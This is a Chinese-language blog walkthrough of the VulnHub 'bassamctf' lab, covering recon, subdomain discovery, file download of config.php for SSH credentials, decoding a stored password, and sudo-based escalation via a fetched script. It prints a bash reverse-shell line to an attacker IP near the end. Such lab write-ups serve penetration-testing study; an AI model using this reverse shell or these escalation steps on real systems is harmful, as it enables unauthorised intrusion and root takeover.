0
点赞
收藏
分享

微信扫一扫

vulnhub靶场之bassamctf

全栈顾问 2023-05-25 阅读 73
phpssh运维

1.信息收集

探测存活主机,输入:netdiscover -r 192.168.239.0/24 ,发现192.168.239.177存活。
在这里插入图片描述
对目标主机192.168.239.176进行端口扫描,发现存活22(SSH)、80端口。
在这里插入图片描述
在浏览器上输入:http://192.168.239.177,查看源码,发现类似于网站的域名。
在这里插入图片描述
在这里插入图片描述
在/etc/hosts文件里面添加ip与对应的域名,浏览器访问域名,访问成果。
在这里插入图片描述
在这里插入图片描述
进行目录扫描,未发现可疑信息。
在这里插入图片描述
进行域名扫描,发现welcome.bassam.ctf,加入/etc/hosts中,访问http://welcome.bassam.ctf。
在这里插入图片描述
对http://welcome.bassam.ctf进行目录扫描,发现index.php与config.php。
在这里插入图片描述
访问index.php发现存在下载的功能。
在这里插入图片描述

2.漏洞利用

在url中输入:http://welcome.bassam.ctf/config.php,无反应;输入config.php下载成功,发现用户test:test123。
在这里插入图片描述
尝试ssh登录成功。在这里插入图片描述

3.提权

在/home/kira中发现可执行文件test.sh,使用cat查看内容。
在这里插入图片描述
查看根目录,发现存在/PassProgram/文件夹,进入文件夹中,发现存在解码和编码。
在这里插入图片描述
查看/var/www/ctf,存在MySecretPassword可疑文件。
在这里插入图片描述
查看MySecretPassword文件类型为text,但无法查看。使用hexdump查看文件。猜测是用/PassProgram目录下的encoder加密的。
在这里插入图片描述
使用decoder解密,可得kira用户的密码为:kira2003。切换到kira用户。
在这里插入图片描述
输入sudo -l发现存在sudo提权。
在这里插入图片描述
切换到bassam用户。
在这里插入图片描述
查看bassam目录下存在down.sh文件,查看内容为下载script.sh文件。
在这里插入图片描述
将mywebsite.test域名添加到本机的hosts文件中
在这里插入图片描述
创建script.sh文件,在里面输入bash -i >& /dev/tcp/192.168.239.131/8888 0>&1,使用PHP开启web服务php -S 0:80
在这里插入图片描述
开启本地监听,在另一个shell中输入sudo ./down.sh,反弹shell成功。
在这里插入图片描述
在这里插入图片描述

举报

相关推荐

0 条评论